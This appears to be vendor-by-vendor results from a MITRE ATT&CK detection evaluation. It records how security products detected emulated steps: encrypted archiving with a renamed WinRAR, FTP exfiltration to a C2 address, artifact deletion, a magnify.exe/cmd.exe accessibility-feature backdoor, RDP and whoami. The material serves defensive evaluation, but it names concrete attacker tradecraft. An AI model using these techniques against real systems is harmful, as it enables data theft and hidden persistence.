Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert. [1]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert was generated on execution of recycler.exe named "Exfiltration-Encrypting Files with WinRar". The alert was tainted by parent Windows Script Executing PowerShell alert. [1] [2]
Enrichment (Delayed, Tainted)
The capability enriched recycler.exe with the correct ATT&CK Technique (T1022 - Data Encrypted) and Tactic (Exfiltration). The enrichment was tainted by parent Windows Script Executing PowerShell alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data. The telemetry was tainted by parent Windows Script Executing PowerShell alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
FireEye
General Behavior
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alerted noted that all legitimate files should be written to a subfolder of the Recycle Bin. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched recycler.exe writing old.rar to the root of the Recycle Bin with an alert for Rar Archive Created (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed recycler.exe creating an encrypted RAR archive. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1022 - Data Encrypted). [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (recycler) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2]
Telemetry
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe creating recycler.exe and executing the command-line arguments including the -hp flag indicating WinRAR utility execution with compression and encryption. The telemetry was tainted by parent "Powershell executed encoded commands" and "Policy Dropper Behavior" alerts Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
Enrichment (Configuration Change, Tainted)
The capability showed recycler.exe creating old.rar in the Recycle Bin and enriched the data with "Data Exfiltration Archiving" due to the archive file being created. The enrichment was tainted by parent "Powershell executed encoded command" alerts. The conditions contributing to Enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. Telemetry also showed the creation of old.rar as the output of recycler.exe running. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed execution sequence for recycler.exe with WinRAR command-line arguments, including the -hp flag, for data encryption and compression (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts). [1] [2]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine [1]
RSA
Telemetry
Telemetry showed execution of recycler.exe with full command-line arguments, including -hp flag, indicating compression and encryption was used with a WinRAR utility. Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of recycler.exe with command-line arguments, including the -hp flag, indicating use of encryption and compression with a WinRAR utility. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated on execution of recycler.exe indicating it was WinRAR and was masquerading as a renamed process. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments.". Details showed that recycler.exe wrote a RAR archive and that recycler.exe was signed by win.rar GmbH. The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert was generated on execution of recycler.exe named "Exfiltration-Encrypting Files with WinRar". The alert was tainted by parent Windows Script Executing PowerShell alert. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by parent Windows Script Executing PowerShell alert. [1] [2] [3]
FireEye
General Behavior
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed recycler.exe creating an encrypted RAR archive. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched recycler.exe writing old.rar to the root of the Recycle Bin with an alert for Rar Archive Created (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alerted noted that all legitimate files should be written to a subfolder of the Recycle Bin. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with related ATT&CK Techniques (T1022 - Data Encrypted and T1002 - Data Compressed). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. Additionally recycler.exe was identified as WinRAR via file metadata, including executable product and description. [1] [2] [3]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed recycler.exe creating old.rar in the Recycle Bin and enriched the data with "Data Exfiltration Archiving" due to the archive file being created. The enrichment was tainted by parent "Powershell executed encoded command" alerts. The conditions contributing to Enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed powershell.exe creating recycler.exe and executing the command-line arguments including the -hp flag indicating WinRAR utility execution with compression and encryption. The telemetry was tainted by parent "Powershell executed encoded commands" and "Policy Dropper Behavior" alerts. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. Telemetry also showed the creation of old.rar as the output of recycler.exe running. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed execution sequence for recycler.exe with RAR command-line arguments, including the -hp flag, for data encryption and compression indicating it was actually WinRAR masquerading as a different file (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts). [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert on wscript.exe [1] [2] [3] [4]
Enrichment
The capability enriched recylcer.exe executing with command-line arguments with a related ATT&CK Technique (Masquerading). [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed execution of recycler.exe with full command-line arguments, including -hp flag, indicating compression and encryption was used with a WinRAR utility. Vendor stated file hash is also available that could be used with sources like Virustotal to identify the binary. YARA is also supported and rules could be created to identify WinRAR. Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed. [1] [2]
SentinelOne
Enrichment (Tainted)
Telemetry showed execution of recycler.exe with command-line arguments, including the -hp flag, indicating use of encryption and compression with a WinRAR utility. The Process Name field in the row for recycler.exe enriched the event with "Command line RAR". The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Enrichment
The capability enriched ftp.exe with the correct ATT&CK Technique (Exfil Over Alternate Protocol). [1] [2]
Telemetry
Telemetry showed a process tree for ftp.exe being executed with command-line arguments including ftp.txt. [1] [2]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because collected files were exfiltrated via FTP. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating ftp.exe executing with ftp.txt was suspicious. The process tree view showed ftp.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2]
Telemetry
Telemetry within the OverWatch alert showed ftp.exe executing with ftp.txt. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Cybereason
Telemetry
Telemetry showed the execution of ftp.exe and command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4]
Enrichment (Tainted)
The capability enriched ftp.exe execution with a related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry showed the creation of ftp.txt and ftp.exe executing with command-line arguments. Telemetry also showed the FTP connection to 192.168.0.4 (C2 server) on port 21. [1]
FireEye
Enrichment
The capability enriched ftp.exe execution with an alert for FTP Utility Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Software (T0095 - FTP). [1] [2] [3] [4]
Enrichment
The capability enriched a TCP port 21 connection to 192.168.0.4 (C2 server) with an alert for FTP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1048 - Exfiltration Over Alternative Protocol) and Tactic (Exfiltration). [1] [2] [3] [4]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the ftp commands being written to ftp.txt and the subsequent execution of ftp.exe with the file. The old.rar file was seen uploaded to 192.168.0.4 (C2 server). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4]
Enrichment
The capability enriched ftp.exe with the -s argument with a separate alert for FTP Utility Execution (Weak Signal). [1] [2] [3] [4]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for the execution of ftp.exe with a command file option by an unusual parent process and could be used for exfiltration. [1] [2]
Telemetry
Telemetry showed ftp.exe with ftp.txt as an argument as well as an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing ftp.exe with ftp.txt as an argument as well as an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by the parent \"Powershell executed encoded commands\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched powershell.exe executing ftp.exe with the correct ATT&CK Tactic (Exfiltration) and Technique (Exfiltration over Alternative Protocol) and a suspicious indicator that a connection was made to a remove server via the ftp protocol. [1] [2]
Telemetry (Tainted)
Telemetry showed powershell.exe executing ftp.exe, which made an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed execution sequence for ftp.exe with command-line arguments including ftp.txt (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts). Telemetry also showed connections to 192.168.0.4 (C2 server) on ports 20 and 21 for the FTP connection. [1] [2] [3]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed the execution of ftp.exe and command-line arguments as well as a an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3]
Enrichment (Tainted)
The capability enriched ftp.exe as the execution of a CLI file transfer/copy utility. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3]
RSA
Telemetry
Telemetry showed the execution of ftp.exe with command-line arguments, including ftp.txt, for exfiltration. The contents of ftp.txt was not seen. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed ftp.exe running with ftp.txt as an argument. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1]
Carbon Black
Telemetry
Telemetry showed the deletion of old.rar. [1] [2]
CrowdStrike
Telemetry
Telemetry showed the deletion of old.rar with an event name of FileDeleted. [1] [2] [3] [4]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including old.rar) were deleted from the host CodeRed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed a deletion event for old.rar via powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure, though there was telemetry to show the creation of old.rar. A host query for the file showed the old.rar no longer exists, but no deletion event was seen. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe executing the command to delete old.rar. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe deleting old.rar from the Recycle Bin. The telemetry was tainted by the parent \"PowerShell executed encoded commands\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2]
Microsoft
None
No detection capability demonstrated for this procedure, though data showed execution sequence for the PowerShell "Remove-Item" cmdlet (no arguments were available to indicate what was deleted). [1]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed the file delete event for old.rar. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2]
RSA
None
No detection capability demonstrated for this procedure. The master file table on 10.0.1.5 (CodeRed) was inspected through the capability to look for deleted files, showing old.rar. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed the file deletion of old.rar. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed the deletion of recycler.exe. [1] [2]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including recycler.exe) were deleted from the host CodeRed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry
Telemetry showed the deletion of recycler.exe with an event name of ExecutableDeleted. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed a deletion event for recycler.exe via powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2]
Endgame
Telemetry
Telemetry showed a deletion event for recycler.exe caused by powershell.exe. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe executing the command to delete recycler.exe. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe deleting recycler.exe. The telemetry was tainted by the parent \"PowerShell executed encoded commands alert\". Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched PowerShell deleting recylcer.exe with the correct ATT&CK Tactic (Defense Evasion) and Technique (File Deletion) and a suspicious indicator that an executable file was deleted from the system root folder. [1] [2]
Telemetry (Tainted)
Telemetry showed file deletion event for recycler.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Microsoft
None
No detection capability demonstrated for this procedure. [1]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed the file delete event for recycler.exe. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2]
RSA
None
No detection capability demonstrated for this procedure. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed the file deletion of recycler.exe. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
General Behavior
A General Behavior alert was generated named "Execution of cmd from non-standard path" with a 60/100 severity score. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated on execution of magnify.exe named "Suspicious screen magnifier process" with a 76/100 severity score. [1] [2] [3] [4]
General Behavior
A General Behavior alert was generated named "Suspicious renamed cmd process" with a 72/100 severity score. [1] [2] [3] [4]
Telemetry
Telemetry within the process tree that showed magnify.exe executing from utilman.exe. [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry within the alert showed the details for magnify.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated on utilman.exe executing magnify.exe, noting that "a process chain bypassed Windows logon security." The alert was marked critical and was mapped to the correct ATT&CK Technique (Accessibility Features) and Tactic (Persistence). Data in the alert also showed that magnify.exe was identified as cmd.exe based on hash value in the common name field. [1] [2] [3] [4] [5]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating a Windows logon bypass on Creeper was observed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
Cybereason
Specific Behavior
A Specific Behavior alert was generated based on a new process masquerading as a Windows accessibility feature, mapped to the correct ATT&CK Tactic (Persistence) and Technique (Accessibility Features). [1] [2] [3]
Telemetry
Telemetry showed the execution of magnify.exe. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Endgame
Telemetry (Tainted)
Telemetry in the event tree showed the execution of magnify.exe by utilman.exe (tainted by the Windows File Name Mismatch alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Enrichment (Delayed, Tainted)
The capability enriched magnify.exe with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactics (Defense Evasion, Execution) (tainted by the Windows File Name Mismatch alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated on Windows File Name Mismatch between magnify.exe and cmd.exe, indicating this could be used for accessibility features in the description. The alert is tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactics (Defense Evasion, Execution). [1] [2] [3] [4]
FireEye
Specific Behavior
A Specific Behavior alert was generated for Accessibility Features Child Process due to whoami.exe spawning from magnify.exe. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactics (Persistence, Privilege Escalation). [1] [2] [3] [4] [5] [6] [7]
General Behavior
A General Behavior alert was generated for RENAMED CMD.EXE, with a description explaining how attackers will sometimes rename cmd.exe to other filenames to try to bypass detections. [1] [2] [3] [4] [5] [6] [7]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker replaced the magnifier.exe accessibility feature to launch a privileged command shell. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7]
F-Secure
Enrichment
The capability enriched utilman.exe executing magnify.exe with a tag indicating that magnify was a persistent backdoor. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed magnify.exe executing from utilman.exe with the original file name of cmd.exe. [1] [2] [3] [4] [5]
General Behavior
A General Behavior alert was generated for magnify.exe executing as a process with a renamed executable. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry showed magnify.exe executing from parent process utilman.exe (PID 3996). The telemetry was tainted by the parent POS Interactive Login Event alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Specific Behavior
A Specific Behavior alert was generated for the command prompt tool executed by masquerading an accessibility tool. The alert was tagged with the correct ATT&CK Tactics (Persistence, Privilege Escalation) and Technique (Accessibility Features). [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed magnify.exe (original name identified as cmd.exe) executing from utilman.exe. The telemetry was tainted by a trace detection on magnify.exe. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed execution of magnify.exe from utilman.exe. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated on a successful sticky keys binary hijack because magnify.exe was executing as cmd.exe. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry
Telemetry showed magnify.exe executing from utilman.exe. [1] [2] [3]
RSA
Telemetry
Telemetry showed execution of magnify.exe. [1] [2] [3]
SentinelOne
Telemetry
Telemetry showed execution of magnify.exe which was identified as a Windows Command Processor within the interface. Activity associated with a new story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry showed a logon type 10 (remote interactive logon) for Kmitnick on Creeper, indicating a RDP session was established and logged into. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Telemetry
Telemetry showed creation of a RDP session on Creeper (10.0.0.4). [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched a RDP connection with information that the connection was made to a RDP port, as well as a related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol). [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed a connection to port 3389 on Creeper (10.0.0.4) with information transmitted in bytes indicating a RDP session was established. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched a TCP port 3389 connection with an alert for RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the use of the Remote Desktop Protocol to connect to Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Enrichment
The capability enriched a Remote Desktop connection indicating a successful login to Remote Desktop Services. [1] [2] [3]
GoSecure
Telemetry
Telemetry showed an inbound connection to Creeper (10.0.0.4) on port 3389. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
Telemetry
Telemetry showed creation of a terminal services session on Creeper from CodeRed with corresponding logon by Kmitnick. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed an inbound connection to Creeper (10.0.0.4) on port 3389. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure. [1]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
Enrichment
The capability enriched whoami.exe with the correct ATT&CK Technique (T1033 - System Owner/User Discovery). [1] [2] [3] [4] [5]
Telemetry
Telemetry within the process tree showed magnify.exe executing whoami.exe. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry (Tainted)
Telemetry showed execution of whoami.exe. The process tree view showed whoami.exe was tainted by a previous magnify.exe detection. [1] [2] [3] [4] [5] [6]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated based on whoami.exe performing Reconnaissance as a SYSTEM user. The alert was tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery). The alert was tainted by a parent Accessibility Features alert. [1] [2] [3] [4]
Telemetry
Telemetry showed the execution of whoami.exe. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched whoami.exe with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery). The enrichment was tainted by an alert on Windows File Name Mismatch-Accessibility Features. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed whoami.exe was executed from magnify.exe. The telemetry was tainted by an alert on Windows File Name Mismatch-Accessibility Features. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Enrichment
The capability enriched whoami.exe with an alert for Whoami Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed whoami.exe executing from magnify.exe within an alert for Accessibility Features Child Process. The telemetry was tainted by the Accessibility Features Child Process (METHODOLOGY) alert. [1] [2] [3] [4] [5] [6] [7]
F-Secure
Enrichment
The capability enriched whoami.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated showing that a spawned process (whoami) has been tagged for monitoring because its parent process has a detection (magnify.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry
Telemetry showed whoami.exe was executed from magnify.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Telemetry (Tainted)
Telemetry showed magnify.exe executing whoami.exe. The telemetry was tainted by the parent POS Interactive Login Event alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Specific Behavior
A Specific Behavior alert was generated for the whoami command was executed through a masqueraded tool (magnify.exe). [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed magnify.exe (original name identified as cmd.exe) executing whoami.exe. The telemetry was tainted by a trace detection on magnify.exe. [1] [2] [3] [4] [5] [6] [7]
Microsoft
Telemetry (Tainted)
Telemetry showed whoami.exe executing from magnify.exe (tainted by sticky keys binary hijack alert). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched whoami.exe executing as an enumeration command. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed magnify.exe executing whoami.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed execution of whoami.exe. [1] [2] [3]
SentinelOne
Enrichment
Enrichment showed execution of the whoami command (enriched with description "whoami - displays logged on user information"). Execution of whoami was associated to the story (Group ID) created from the execution of magnify.exe, but was not considered tainted because an alert was not generated when magnify.exe was executed. [1] [2] [3] [4]